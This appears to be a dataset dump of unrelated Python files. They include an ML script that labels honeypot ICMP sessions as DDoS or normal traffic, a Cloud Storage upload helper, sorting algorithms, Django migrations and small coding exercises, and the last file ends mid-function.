text stringlengths 8 6.05M |
|---|
# Benchmark: sum i**i for i = 1..999 and print the last ten digits.
# Fixes: converted Python 2 print statements to Python 3 print(), and
# renamed the accumulator from `sum` (which shadowed the builtin).
from time import time

start = time()
total = 0
for i in range(1, 1000):
    total += i ** i
print(str(total)[-10:])
print("Time: {0} secs".format(time() - start))
# -*- coding: utf-8 -*-
import zmq
import os
# connect and open to ryuData App
# os.system("xterm -e \"python2 ryu-restapi.py\" &")
# os.system("xterm -e \"python2 cpusingle.py\" &")
# time.sleep(5)
# print "Done"
print "Please Wait ....."
import numpy as np
import pandas as pd
import sched
import time
import subprocess
import sys
from twisted.internet import task, reactor
from sklearn import svm
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier, GradientBoostingClassifier
from sklearn.svm import LinearSVC, SVC
from sklearn.neighbors import KNeighborsClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.linear_model import LogisticRegression, LinearRegression
from sklearn.tree import DecisionTreeClassifier
from sklearn.model_selection import cross_val_score
from sklearn.preprocessing import LabelEncoder
from sklearn.metrics import precision_recall_fscore_support
from sklearn.preprocessing import LabelEncoder
from subprocess import Popen, PIPE, STDOUT
import matplotlib.pyplot as plt
import seaborn as sns
from twisted.internet import task, reactor
import warnings
from sklearn.exceptions import ConvergenceWarning, DataConversionWarning
warnings.simplefilter("ignore", ConvergenceWarning)
warnings.simplefilter("ignore", FutureWarning)
warnings.simplefilter("ignore", DataConversionWarning)
import getopt
from scapy.all import *
from scapy import all as scapy
from random import randrange
from scapy.utils import PcapWriter
import strings
import requests
import json
def getType(whoIP):
    """Label each source IP for precision/recall/F1 scoring.

    The three hard-coded addresses are treated as benign ('NORMAL');
    every other source is labelled 'DDOS'.
    """
    normal_hosts = ("192.168.3.17", "192.168.3.18", "192.168.3.33")
    return ["NORMAL" if ip in normal_hosts else "DDOS" for ip in whoIP]
timeout = 10.0  # seconds between doWork() runs (original comment said "Sixty seconds", but the value is 10)
def doWork():
    """Periodic job: export the last 10 s of ICMP honeypot sessions from
    MongoDB ("mnemosyne" db), label them with getType(), then train and
    score a DDoS classifier (LinearSVC pseudo-labelling + AdaBoost).

    Python 2 code (print statements) — must run under python2.
    NOTE(review): indentation was reconstructed from flattened source.
    """
    ts = time.time()
    one = (ts)*1000            # now, in milliseconds
    time1 = int(one)
    two = (ts-10)*1000         # ten seconds ago, in milliseconds
    time2 = int(two)
    # print "time now = %s , and time 5 second pass = %s" % (one, two)
    print "time 10 second pass = %s , and time now = %s" % (time2, time1)
    # dump ICMP sessions from the 10-second window to output/<time1>.csv
    subprocess.call(["mongoexport",
        "--db",
        "mnemosyne",
        "--collection",
        "session",
        "--type=csv",
        "--fields=_id,protocol,hpfeed_id,timestamp,source_ip,destination_ip,identifier,honeypot",
        "-q", """{"timestamp":{$gt:new Date(%s),$lt:new Date(%s)}, "protocol" : "ICMP"}""" % (time2, time1),
        "--out",
        "output/%s.csv" % time1])
    dataset = pd.read_csv('icmp/dataSample/test.csv') # read & prepare labelled reference data
    getDataset = pd.read_csv('output/%s.csv' % time1)
    getIP = getDataset['source_ip']
    aType = getType(getIP)                                   # ground-truth labels per source IP
    trueType = pd.DataFrame(data=aType,columns=['type'])
    # NOTE(review): join_axes was removed in pandas 1.0 — requires an old pandas
    dataset2 = pd.concat([getDataset, trueType], axis = 1, join_axes=[getDataset.index])
    columnz = ['_id','protocol','hpfeed_id','timestamp','source_ip','destination_ip','identifier','honeypot']
    columnzz = ['_id','protocol','hpfeed_id','timestamp','source_ip','destination_ip','identifier','honeypot','type']
    dropUnsuable = dataset.drop(dataset.columns[0], axis=1) # drop type
    if not aType :
        # nothing captured in this window: remove the empty export and return
        print "\n------------ We dont have data to be process ------------\n"
        subprocess.call(["rm", "output/%s.csv" % time1])
        # subprocess.call(["rm", "output/encode/%s_encode.csv" % time1])
    else:
        print "\n----------------- data ready to process -----------------"
        joinData = pd.concat([dropUnsuable, dataset2], ignore_index=True)
        # joinData.to_csv(r'dataSample/testes.csv')
        Xa = joinData.drop(columns=['type'])
        Ya = joinData['type'].values
        labelencoder = LabelEncoder() # prepare for labelEncoder
        Xb = Xa.apply(labelencoder.fit_transform) # apply label encoder on "Xa"
        Yb = labelencoder.fit_transform(Ya) # apply label encoder on "Ya"
        Xb.to_csv(r'output/encode/%s_encode.csv' % time1)
        sc_X = StandardScaler() # prepare for StandardScaler
        X = sc_X.fit_transform(Xb) # scale the encoded features
        Xscaler = pd.DataFrame(X, columns=columnz)
        Xscaler.to_csv(r'output/scaler/%s_scaler.csv' % time1)
        # split Train: rows coming from the labelled reference dataset
        jm = (dataset.index[-1])
        arrayTrain = Xb[:jm]
        getYtrain = Yb[:jm]
        trainScalern = X[:jm]
        # split Test: rows coming from the freshly exported window
        jmt = (dataset.index[-1])+1
        arrayTest = Xb[jmt:].reset_index(drop=True)
        getYtest = Yb[jmt:]
        testScalern = X[jmt:]
        dropTest = pd.DataFrame(testScalern, columns=columnz) # call 'X test' array and make them to dataframe
        # start execute data with ML algorithm
        start = time.time() #timestart
        lin_clf = svm.LinearSVC()
        lin_clf.fit(trainScalern, getYtrain) # training "x train" and "y train"
        pseudoY_test = lin_clf.predict(dropTest) # pseudo-labels for the new window
        X = np.vstack((trainScalern, testScalern))
        Y = np.concatenate((getYtrain, pseudoY_test), axis=0)
        pseudo_model = svm.LinearSVC()
        pseudo_model.fit(X, Y) # refit LinearSVC on real + pseudo labels
        clf = AdaBoostClassifier(n_estimators=10)
        scores = cross_val_score(clf, X, Y) # cross-validate AdaBoost
        scores.mean()
        clf.fit(X, Y)
        AccuracY = clf.score(X, Y)  # NOTE(review): accuracy on training data, not held-out data
        print "Accuracy : ", AccuracY*100, "%"
        stop = time.time()
        timeF = stop - start
        print "--- %s seconds ---" % timeF
        prediction = clf.predict(testScalern)
        allScore = precision_recall_fscore_support(getYtest, prediction, average='micro')
        print "Precision : ", allScore[0]
        print "Recall : ", allScore[1]
        print "f1 Socre : ", allScore[2]
        print prediction
        # (disabled) zmq notification to ryu-restapi.py when a DDOS row (0) is predicted:
        # for rr in prediction:
        #     if rr == 0 :
        #         context = zmq.Context()
        #         socket = context.socket(zmq.REQ)
        #         socket.connect("tcp://localhost:5555")
        #         socket.send(b"Dattaa")
        #         message = socket.recv()
        #         print("Received reply : [ %s ]" % message)
        print "\nDone"
        print "\n"
    pass
# Schedule doWork() on the twisted reactor; reactor.run() blocks forever.
l = task.LoopingCall(doWork)
l.start(timeout) # call every `timeout` seconds (10 s; old comment said sixty)
reactor.run()
import numpy as np
from numpy import linalg as LA
from matrix_utils import getPMatrix
def matrixForPeriod(layers):
    """Transfer matrix for one period: ordered product of per-layer matrices.

    Generalized from exactly two layers to any non-empty sequence while
    preserving the original left-to-right product order (M1 @ M2 @ ...).
    For the original two-layer input the result is identical.
    """
    matrices = [matrixForLayer(layer) for layer in layers]
    product = matrices[0]
    for m in matrices[1:]:
        product = np.dot(product, m)
    return product
def matrixForLayer(layer):
    """Single-layer matrix: P @ D @ P_reverse (similarity-style product)."""
    p = layer.getPMatrix()
    d = layer.getDMatrix()
    p_rev = layer.getPReverseMatrix()
    return np.dot(np.dot(p, d), p_rev)
# layers =[layerFirst, layerSecond]
def getResultMatrix(layers, d):
    """inv(P(first layer)) @ (period transfer matrix)^d.

    `layers` must be a two-element sequence [layerFirst, layerSecond].
    """
    layerFirst, layerSecond = layers  # enforces exactly two layers
    period_power = LA.matrix_power(matrixForPeriod(layers), d)
    p_inv = LA.inv(getPMatrix(layerFirst.alfa0, layerFirst.n0))
    return np.dot(p_inv, period_power)
# layers =[layerFirst, layerSecond]
def getMatrixPower(layers,d):
    """(period transfer matrix)^d for a two-element `layers` sequence."""
    layerFirst, layerSecond = layers  # enforces exactly two layers
    return LA.matrix_power(matrixForPeriod(layers), d)
def getResultMatrixWithCa(layers, lastCaLayer, d):
    """inv(P(first layer)) @ M(lastCaLayer) @ (period transfer matrix)^d."""
    layerFirst, layerSecond = layers  # enforces exactly two layers
    period_power = LA.matrix_power(matrixForPeriod(layers), d)
    left = np.dot(LA.inv(getPMatrix(layerFirst.alfa0, layerFirst.n0)),
                  matrixForLayer(lastCaLayer))
    return np.dot(left, period_power)
|
from torch import nn
class BasePositionalEmbedding(nn.Module):
    """Base class for positional embeddings.

    Subclasses must define `positional_embedding_size`. Both hooks here are
    identity passthroughs: they return the embedding unchanged together with
    the (unused) cache `h`.
    Fix: `metadata_dict` defaulted to a shared mutable `{}`; it now defaults
    to None (the base class never reads it).
    """

    def __init__(self) -> None:
        super().__init__()

    def forward(self, x_embed, i=0, h=None, metadata_dict=None):
        return x_embed, h

    def forward_step(self, x_embed, i=0, h=None, metadata_dict=None):
        return x_embed, h
class PositionalEmbedding(nn.Module):
    """Positional embeddings built from a list of "base" positional
    embeddings like
    - ChannelEmbedding,
    - SinusoidalEmbedding
    - etc.

    Fixes: `metadata_dict={}` mutable default replaced with None (an empty
    dict is still passed to the children, as before); the
    `isinstance(h, list): pass / else / if h is None` ladder is collapsed to
    the equivalent `if h is None` check.
    """

    def __init__(self, base_positional_embedding_list) -> None:
        super().__init__()
        self.base_positional_embeddings = nn.ModuleList(
            base_positional_embedding_list)
        # total size is the sum of the children's sizes
        self.positional_embedding_size = sum(
            pe.positional_embedding_size
            for pe in base_positional_embedding_list
        )

    def forward(self, x_embed, i=0, h=None, metadata_dict=None):
        """Apply every base positional embedding in turn to x_embed.

        Args:
            x_embed (batch_size, num_tokens, embedding_dim): embedded sequence
            i (int, optional): index of the first token. Defaults to 0.
            h (list of tensors, optional): cached values, one per embedding.
                Defaults to None (a list of Nones is used).
            metadata_dict (dict, optional): extra info forwarded to children.
        Returns:
            (x_embed with positional info, list of new cached values)
        """
        if metadata_dict is None:
            metadata_dict = {}
        if h is None:
            h = [None] * len(self.base_positional_embeddings)
        new_h_list = []
        for positional_embedding, h_pe in zip(self.base_positional_embeddings, h):
            x_embed, new_h_pe = positional_embedding.forward(
                x_embed, i=i, h=h_pe, metadata_dict=metadata_dict)
            new_h_list.append(new_h_pe)
        return x_embed, new_h_list

    def forward_step(self, x_embed, i=0, h=None, metadata_dict=None):
        """Single-step variant of forward().

        Args:
            x_embed (batch_size, embedding_dim): embedded token
            i (int, optional): index of the token in the whole sequence.
            h (list of tensors, optional): cached values, one per embedding.
            metadata_dict (dict, optional): extra info forwarded to children.
        """
        if metadata_dict is None:
            metadata_dict = {}
        if h is None:
            h = [None] * len(self.base_positional_embeddings)
        new_h_list = []
        for positional_embedding, h_pe in zip(self.base_positional_embeddings, h):
            x_embed, new_h_pe = positional_embedding.forward_step(
                x_embed, i=i, h=h_pe, metadata_dict=metadata_dict)
            new_h_list.append(new_h_pe)
        return x_embed, new_h_list
# -*- coding: utf-8 -*-
from datetime import datetime
from google.cloud import storage
import os
import requests
import json
# ML endpoint configuration.
# NOTE(review): original comments were mojibake (mis-decoded Korean);
# this one presumably read "set the address connecting to the ML service".
addr = ''
URL = addr + ''
# Storage Setting
os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = ''  # path to service-account JSON (left blank here)
BUCKET_NAME = ''  # target GCS bucket name (left blank here)
client = storage.Client()          # requires valid credentials at import time
bucket = client.get_bucket(BUCKET_NAME)  # network call at import time
def now():
    """Current wall-clock time as 'HH:MM:SS' (used as a log prefix)."""
    current = datetime.now()
    return current.strftime('%H:%M:%S')
def filetime():
    """Current timestamp as 'MMDD_HH-MM-SS' (filesystem-safe file name)."""
    current = datetime.now()
    return current.strftime('%m%d_%H-%M-%S')
def delete_blob():
    """Delete every blob in the module-level `bucket` (full bucket wipe).

    NOTE(review): the print string is mojibake (mis-decoded Korean),
    roughly "{time} : {name} deleted" — left byte-identical on purpose.
    """
    for blob in bucket.list_blobs():
        bucket.delete_blob(blob_name=blob.name)
        print('{} : {} ์ญ์ ํ์ต๋๋ค.'.format(now(), blob.name))
def upload_blob(name, parsed_data):
    """Wipe the bucket, then upload the original image plus one cropped
    image per detected object for `name` from the local data/ directory.

    Fix: several comment/string literals had been split mid-line by text
    extraction, leaving the module unparseable; they are rejoined here.
    The Korean log strings are mojibake from a bad decode and are kept
    byte-for-byte (only rejoined, not translated).
    """
    # delete existing bucket contents before uploading (translated comment)
    delete_blob()
    print("{} : ํด๋ผ์ฐ๋ ์คํ ๋ฆฌ์ง ์ด๊ธฐํ ์๋ฃ".format(now()))
    # upload the original image (translated comment)
    print("{} : ์๋ก๋๋ฅผ ์์ํฉ๋๋ค.".format(now()))
    original_path = "data" + '/' + name + '/' + 'original' + '.png'  # local path
    original_upload_name = name + '.png'  # blob name in the bucket
    original_img = bucket.blob(original_upload_name)
    original_img.upload_from_filename(filename=original_path)
    print("{} : {}๋ฅผ {}๋ก ํด๋ผ์ฐ๋์ ์๋ก๋ ํ์์ต๋๋ค.".format(now(), original_path, original_upload_name))
    global predict  # kept from original; `predict` is never assigned here — TODO confirm intent
    # upload each cropped object file (translated comment)
    #idx = 0
    for i in range(len(parsed_data)):  # one cropped image per detected object
        croped_upload_name = name + '-' + str(i) + '_' + parsed_data[i][0] + '.jpg'  # blob name
        try:
            croped_image = bucket.blob(croped_upload_name)
            croped_image_path = "data" + '/' + name + '/' + str(i) + '_' + parsed_data[i][0] + '.jpg'  # local path
            croped_image.upload_from_filename(filename=croped_image_path)
            print("{} : {}๋ฅผ {}๋ก ํด๋ผ์ฐ๋์ ์๋ก๋ ํ์์ต๋๋ค.".format(now(), croped_image_path, croped_upload_name))
        except:
            # best-effort: a missing or failed crop upload is skipped silently
            pass
    print("{} : ํด๋ผ์ฐ๋ ์๋ก๋ ์๋ฃ!".format(now()))
def delete_file_dir(mydir):
    """Remove every entry directly inside `mydir`, logging each deletion."""
    for fname in os.listdir(mydir):
        os.remove(os.path.join(mydir, fname))
        print(fname + ' is deleted!')
def post_image(img_file, URL, headers):
    """POST the raw bytes of the file at `img_file` to `URL`.

    Returns the requests Response object.
    Fix: the original opened the file without ever closing it (leaked
    handle); reading now happens inside a `with` block.
    """
    with open(img_file, 'rb') as f:
        img = f.read()
    response = requests.post(URL, data=img, headers=headers)
    return response
def request_vision(image):
    """Send `image` to the vision ML endpoint (module-level URL) and return
    the 'predict' field of its JSON response.

    NOTE(review): res.json() is passed through json.loads() again — this
    only works if the server double-encodes (returns a JSON string); confirm.
    """
    # prepare headers for http request
    content_type = 'image/jpeg'
    headers = {'content-type': content_type}
    res = post_image(image, URL, headers)
    print("{} : VISION - ์ธ์ ์๋ฃ".format(now()))  # mojibake log line, roughly "recognition done"
    j = json.loads(res.json())
    result = j['predict']
    return result
|
# Count occurrences of each lowercase letter a-z in the input word.
# (Original comments were mojibake Korean; translated to English.)
alphabet='abcdefghijklmnopqrstuvwxyz'
result=[0 for _ in range (26)]
S=input()
for i in S:
    # find the alphabet index of this character and bump its count.
    # NOTE(review): assumes lowercase a-z input — find() returns -1 for any
    # other character, which would silently increment result[-1] ('z').
    idx = alphabet.find(i)
    result[idx] += 1
# counts were initialized as ints; convert to str for space-joined output
result=[str(k) for k in result]
print(' '.join(result))
|
import unittest
def factor(n):
    """Yield the divisors of n in increasing order."""
    return (i for i in range(1, n + 1) if n % i == 0)


def is_prime(n):
    """True iff n's only divisors are 1 and n (0 and 1 are not prime)."""
    return list(factor(n)) == [1, n]


def primes(n):
    """Yield the primes up to and including n."""
    return (i for i in range(2, n + 1) if is_prime(i))
# Fix: PEP 8 — named lambdas replaced with def statements (same behavior).
# "input -> expected output" fixture: the primes up to 20
INPUT_SAMPLE = """\
20 -> 2 3 5 7 11 13 17 19
"""
class Test(unittest.TestCase):
    """Checks primes() against the embedded INPUT_SAMPLE line."""

    def test_input_sample(self):
        # split "N -> p1 p2 ..." into the input and the expected primes
        n, result = INPUT_SAMPLE.split(" -> ")
        n = int(n)
        result = list(map(int, result.split()))
        self.assertEqual(list(primes(n)), result)

if __name__ == "__main__":
    unittest.main()
|
"""
Write a function to find the longest common prefix string amongst an array of strings.
"""
class LCPSolution:
    """Longest common prefix over an array of strings."""

    def longestCommonPrefix(self, strs):
        """Return the longest string that is a prefix of every element.

        :type strs: List[str]
        :rtype: str
        """
        if not strs:
            return ""
        prefix_len = 0
        # zip(*strs) stops at the shortest string, exactly like the
        # bounds check in an index-based scan
        for column in zip(*strs):
            if any(ch != column[0] for ch in column):
                break
            prefix_len += 1
        return strs[0][:prefix_len]
if __name__ == '__main__':
    # smoke tests: each case is (input list, expected common prefix)
    sol = LCPSolution()
    cases = [
        (['abc', 'abcde', 'abbbb', 'abcd'], 'ab'),
        (['abcde', 'cbbbb', 'bvcd'], ''),
        (['abcde', 'abbbb', 'avcd'], 'a'),
        ([], ''),
        (['a'], 'a'),
        (['aa', 'a'], 'a'),
        (["abab", "aba", ""], ''),
    ]
    for strs, expected in cases:
        assert sol.longestCommonPrefix(strs) == expected
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-07-21 19:26
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: crowd_members.member_num now defaults to None."""

    dependencies = [
        ('experiment', '0014_crowd_members_member_num'),
    ]
    operations = [
        migrations.AlterField(
            model_name='crowd_members',
            name='member_num',
            # NOTE(review): default=None on an IntegerField still fails at the
            # DB layer if the column is NOT NULL and no value is given — confirm.
            field=models.IntegerField(default=None),
        ),
    ]
|
# Print a greeting, then a one-element numpy array of ones.
print(" liu ")
import numpy as np

ones_vec = np.ones(1)
print(" {}".format(ones_vec))
import test as t
### print the RENFE ticket menu and dispatch on the user's choice
miubicacion = "Donostia"
mizona = 1
print("***MENU DE RENFE***")
print("1.- Ida\t")
print("2.- Ida y Vuelta\t")
print("3.- Bono Mensual")
opc=input("Su opcion:")
# NOTE(review): ida()/idayvuelta()/mensual() are not defined in this file and
# are not referenced via the imported module `t` — presumably they live in
# test.py and should be called as t.ida() etc.; confirm.
if opc=="1":
    ida()
elif opc=="2":
    idayvuelta()
elif opc=="3":
    mensual()
else:
    print("Numero incorrecto")
"""elif opc==3:has selecci"""
|
# Dictionary basics: literals, nested lookups, mutation, and view objects.
my_dict = {'key1': 'value1', 'key2': 'value2'}
# print(my_dict['key1']) # value1
prices_lookup = {'apple': 2.99, 'oranges': 1.99, 'milk': 5.80}
# print(prices_lookup['apple']) # 2.99
d = {'k1': 123, 'k2': [0,1,2], 'k3': {'insideKey': 100}}
# print(d['k2']) # [0, 1, 2]
# print(d['k2'][2]) # 2
# print(d['k3']['insideKey']) # 100
# chained indexing into a list stored under a key
d = {'key1': ['a','b','c']}
my_list = d['key1'] # ['a','b','c']
letter = my_list[2] # 'c'
letter.upper() # 'C'
d['key1'][2].upper() # 'C'
# adding and reassigning keys
d = {'k1': 100, 'k2': 200}
d['k3'] = 300 # Add a new key value pair
# print(d) # {'k1': 100, 'k2': 200, 'k3': 300}
d['k1'] = 'New Value' # Assign new value to an existing key
# print(d) # {'k1': 'New Value', 'k2': 200, 'k3': 300}
# view objects over keys / values / items
d = {'k1': 100, 'k2': 200, 'k3': 300}
# print(d.keys()) # dict_keys(['k1', 'k2', 'k3'])
# print(d.values()) # dict_values([100, 200, 300])
# print(d.items()) # dict_items([('k1', 100), ('k2', 200), ('k3', 300)])
from Bio.SeqIO import parse
import matplotlib.pyplot as plt
import numpy as np
# Histogram of SwissProt protein lengths restricted to (100, 400) residues.
d = np.array([len(r) for r in parse('uniprot_sprot.fasta', 'fasta')])  # one length per record
# print(d)
plt.hist(d[(d > 100) & (d < 400)])
plt.show()
print(len(d))
print(len(d[d > 500]))
print('median', np.median(d))
subset = d[(d > 100) & (d < 400)]
print(len(subset))
# NOTE(review): label says 'media' (mean) but np.median is computed — confirm intent.
print('media', np.median(subset))
|
def testEqual(str1,str2):
print(str1==str2)
def reverse(text):
    """Return `text` reversed (slice with a negative step)."""
    return text[::-1]
# Smoke tests: each call prints True when reverse() behaves correctly.
testEqual(reverse("happy"), "yppah")
testEqual(reverse("Python"), "nohtyP")
testEqual(reverse(""), "")
import numpy
def arrays(arr):
    """Return `arr` reversed as a numpy float array (HackerRank stub)."""
    return numpy.array(arr, float)[::-1]
|
# Generated by Django 3.1.5 on 2021-03-26 07:54
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: userprofile.LastSearcheTag becomes a TextField
    defaulting to 'RENTYUG'."""

    dependencies = [
        ('main', '0026_auto_20210326_1320'),
    ]
    operations = [
        migrations.AlterField(
            model_name='userprofile',
            name='LastSearcheTag',
            field=models.TextField(default='RENTYUG'),
        ),
    ]
|
# coding=utf-8
'''
functions to generate embedding for each word and sentences
'''
from functools import reduce
from typing import List
from torch import Tensor
import torch
import numpy as np
import vocab
# look_up the dict to convert to indices and do the padding
def corpus_to_indices(vocab: vocab.Vocab, corpus: List[List[str]]) -> Tensor:
    """Convert tokenized sentences to a padded LongTensor of word indices.

    Sentences shorter than the longest one are right-padded with '<pad>'.
    Fixes: the original appended '<pad>' tokens to the caller's sentence
    lists in place (mutating the input corpus) — padding is now done on
    copies; an empty corpus no longer crashes max().
    NOTE: the parameter named `vocab` shadows the imported `vocab` module.
    """
    if not corpus:
        return torch.empty((0, 0), dtype=torch.long)
    max_sent_len = max(len(sent) for sent in corpus)
    padded = [sent + ["<pad>"] * (max_sent_len - len(sent)) for sent in corpus]
    indices_in_lists = vocab.words2indices(padded)
    return torch.tensor(indices_in_lists, dtype=torch.long)
'''
indices = torch.zeros(len(corpus), max_sent_len, dtype=torch.int32)
for i, sent in enumerate(corpus):
sent_indices = np.zeros((1, max_sent_len))
for j, word in enumerate(sent):
sent_indices[j] = vocab.word2id[word]
indices[i] = torch.tensor(sent_indices)
return indices
'''
# look up the dict for indices and convert to varied length sents
def indices_to_corpus(vocab: vocab.Vocab, indices: Tensor) -> List[List[str]]:
    """Map an index matrix back to sentences of words.

    Each row stops at the first 0, the index of '<pad>'.
    """
    corpus = []
    for row in range(indices.shape[0]):
        words = []
        for col in range(indices.shape[1]):
            idx = indices[row][col]
            if idx == 0:
                break
            words.append(vocab.id2word[idx])
        corpus.append(words)
    return corpus
|
from collections import defaultdict
def is_permutation(s1, s2):
    """Return True iff s2 is a rearrangement of the characters of s1.

    Fix: the original never compared lengths, so any strict sub-multiset of
    s1 (e.g. s1="ab", s2="a") was wrongly reported as a permutation.
    """
    if len(s1) != len(s2):
        return False
    counts = defaultdict(int)  # idiomatic defaultdict(int) over lambda: 0
    for c in s1:
        counts[c] += 1
    for c in s2:
        counts[c] -= 1
        if counts[c] < 0:
            return False
    return True
|
# Generated by Django 2.2 on 2019-09-16 08:25
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: interests.year becomes a nullable CharField.

    NOTE(review): default=0 is an integer default on a CharField — Django
    stringifies it; confirm '0' is the intended default.
    """

    dependencies = [
        ('status', '0002_account_displaydownpayment'),
    ]
    operations = [
        migrations.AlterField(
            model_name='interests',
            name='year',
            field=models.CharField(default=0, max_length=50, null=True),
        ),
    ]
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-10-17 02:04
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated: constellation.regionID becomes a ForeignKey to
    evesde.Region with CASCADE delete, stored in column 'regionID'."""

    dependencies = [
        ('evesde', '0002_solarsystem'),
    ]
    operations = [
        migrations.AlterField(
            model_name='constellation',
            name='regionID',
            field=models.ForeignKey(db_column='regionID', on_delete=django.db.models.deletion.CASCADE, to='evesde.Region'),
        ),
    ]
|
import time
from concurrent import futures
class sortingAlgorithms(object):
    """Collection of sorting implementations (bubble, insertion, quick,
    merge) plus naive "threaded" variants built on ThreadPoolExecutor.

    NOTE(review): the *_withThreading variants submit one task at a time
    and immediately wait on .result(), so they run serially;
    max_workers=len(arr)**2 is wildly oversized — presumably these are
    demos, not real parallelism. Indentation reconstructed from flattened
    source.
    """

    def __init__(self):
        pass

    def bubbleSort_noThreading(self, arr):
        # classic bubble sort with early exit when a pass makes no swap;
        # sorts in place and returns the list
        self.arr = arr
        for i in range(0, len(self.arr)+1, 1):
            swapped = False
            for j in range(0, len(self.arr)-1-i, 1):
                if self.arr[j] > self.arr[j+1]:
                    # Swap elements
                    self.arr[j], self.arr[j+1] = self.arr[j+1], self.arr[j]
                    swapped = True
            if not swapped:
                break
            else:
                continue
        return self.arr

    def bubbleSort_withThreading(self, arr):
        # one executor task per outer pass; each pass still runs serially
        self.arr = arr
        self.threadingExecutor = futures.ThreadPoolExecutor(max_workers=len(self.arr)**2)
        for i in range(0, len(self.arr)+1, 1):
            self.thread = self.threadingExecutor.submit(self.bubbleSort_threadingChunk, self.arr, i)
            self.arr = self.thread.result()[0]
            if not self.thread.result()[1]:
                break
            else:
                continue
        return self.arr

    def bubbleSort_threadingChunk(self, arr, i):
        # a single bubble pass; returns [partially-sorted arr, swapped flag]
        swapped = False
        for j in range(0, len(arr)-i-1, 1):
            if arr[j] > arr[j+1]:
                # Swap elements
                arr[j], arr[j+1] = arr[j+1], arr[j]
                swapped = True
        return [arr, swapped]

    def recursiveBubbleSort(self, arr):
        # sorts in place; returns None (bubble() has no return value)
        self.arr = arr;
        def bubble(array):
            for i, num in enumerate(array):
                try:
                    if array[i+1] < array[i]:
                        # Swap values
                        array[i] = array[i+1]
                        array[i+1] = num
                        # Recall bubble
                        bubble(array)
                except IndexError as _ix_:
                    # i+1 ran off the end of the list: pass complete
                    pass
        return bubble(self.arr)

    def insertionSort_noThreading(self, arr):
        # swap-based insertion sort; sorts in place and returns the list
        self.arr = arr
        for i in range(0, len(self.arr), 1):
            for j in range(i, 0, -1):
                if self.arr[j] < self.arr[j-1]:
                    # Swap elements
                    self.arr[j], self.arr[j-1] = self.arr[j-1], self.arr[j]
        return self.arr

    def insertionSort_noThreading_secondType(self, arr):
        # shift-based insertion sort (classic textbook form)
        self.arr = arr
        for i in range(0, len(self.arr), 1):
            self.key = self.arr[i]
            self.j = i - 1
            while self.j >= 0 and self.arr[self.j] > self.key:
                self.arr[self.j + 1] = self.arr[self.j]
                self.j -= 1
            self.arr[self.j+1] = self.key
        return self.arr

    def insertionSort_withThreading(self, arr):
        # one executor task per element insertion; serial in practice
        self.arr = arr
        self.threadExecutor = futures.ThreadPoolExecutor(max_workers = len(self.arr)**2)
        for i in range(0, len(self.arr), 1):
            # Submit thread to the executor
            self.thread = self.threadExecutor.submit(self.insertionSort_threadingChunk, i, self.arr)
            # Returns an array
            self.arr = self.thread.result()
        return self.arr

    def insertionSort_threadingChunk(self, i, arr):
        # insert arr[i] into the already-sorted prefix arr[:i]
        self.threadingArr = arr
        self.key = self.threadingArr[i]
        self.j = i - 1
        while self.j >= 0 and self.threadingArr[self.j] > self.key:
            self.threadingArr[self.j+1] = self.threadingArr[self.j]
            self.j -= 1
        self.threadingArr[self.j + 1] = self.key
        return self.threadingArr

    def recursiveInsertionSort(self, arr):
        # sorts in place; returns None (func() returns None)
        self.arr = arr
        # The "func" function will be used for the recursive insertion sort, so we avoid calling a self.* kind of method more times at once ( recursion )
        def func(arr, n):
            if n <= 1:
                return
            func(arr, n-1)
            last = arr[n-1]
            j = n-2
            while j >= 0 and arr[j] > last:
                arr[j+1] = arr[j]
                j -= 1
            arr[j+1] = last
        return func(self.arr, len(self.arr))

    def quickSort(self, arr):
        # Lomuto-style partition; sorts in place and returns None
        self.arr = arr
        def partition(arr, low, high):
            i = low
            pivot = arr[high]
            # 4 5 3 8 9 7
            for j in range(low, high, 1):
                if arr[j] < pivot:
                    # Swap elements
                    arr[i], arr[j] = arr[j], arr[i]
                    # Increment i
                    i += 1
            # Swap *i* index value with the pivot
            arr[i], arr[high] = arr[high], arr[i]
            return i
        def quickSort_ALGORITHM(arr, low, high):
            if low < high:
                partitionIndexSplitter = partition(arr, low, high)
                quickSort_ALGORITHM(arr, low, partitionIndexSplitter-1)
                quickSort_ALGORITHM(arr, partitionIndexSplitter+1, high)
        return quickSort_ALGORITHM(self.arr, 0, len(self.arr)-1)

    def mergeSort(self, arr):
        # top-down merge sort; sorts in place and returns the list
        self.arr = arr
        def mergeSort_ALGORITHM(array):
            if len(array) > 1:
                # Split it into halves
                middle = len(array) //2
                L = array[:middle]
                R = array[middle:]
                mergeSort_ALGORITHM(L)
                mergeSort_ALGORITHM(R)
                i = j = k = 0
                # merge the two sorted halves back into `array`
                while i < len(L) and j < len(R):
                    if L[i] < R[j]:
                        array[k] = L[i]
                        i += 1
                        k += 1
                    else:
                        array[k] = R[j]
                        j += 1
                        k += 1
                # Add left overs
                while i < len(L):
                    array[k] = L[i]
                    i += 1
                    k += 1
                while j < len(R):
                    array[k] = R[j]
                    j += 1
                    k += 1
        mergeSort_ALGORITHM(self.arr)
        return self.arr
# Driver: time mergeSort() on a worst-case (descending) list of user-chosen size.
compareObject = sortingAlgorithms()
# NOTE(review): eval() on raw user input can execute arbitrary code —
# int(input(...)) would be safer if only integers are expected.
RANGE_STOP = eval(input("RANGE STOP > "))
n = list(range(1, RANGE_STOP+1))[::-1]  # descending list = worst case input
start = time.perf_counter()
compareObject.mergeSort(n)
print(n)
print("Time needed : {0}".format(time.perf_counter() - start))
|
import math
import unittest
from tree_utils import Node
def build_minimal_bst(array, start, end):
    """Build a minimal-height BST from the sorted slice array[start:end].

    Child subtrees are split as evenly as possible, so the result may not
    be a complete tree.
    """
    if end <= start:
        return None
    mid = (start + end) // 2
    node = Node(array[mid])
    node.left = build_minimal_bst(array, start, mid)
    node.right = build_minimal_bst(array, mid + 1, end)
    return node
def build_complete_bst(array, start, end):
    """Build a complete BST from the sorted slice array[start:end]."""
    if end <= start:
        return None
    # choose the root index so the left subtree fills its last level first
    size = end - start
    height = int(math.log(size, 2))
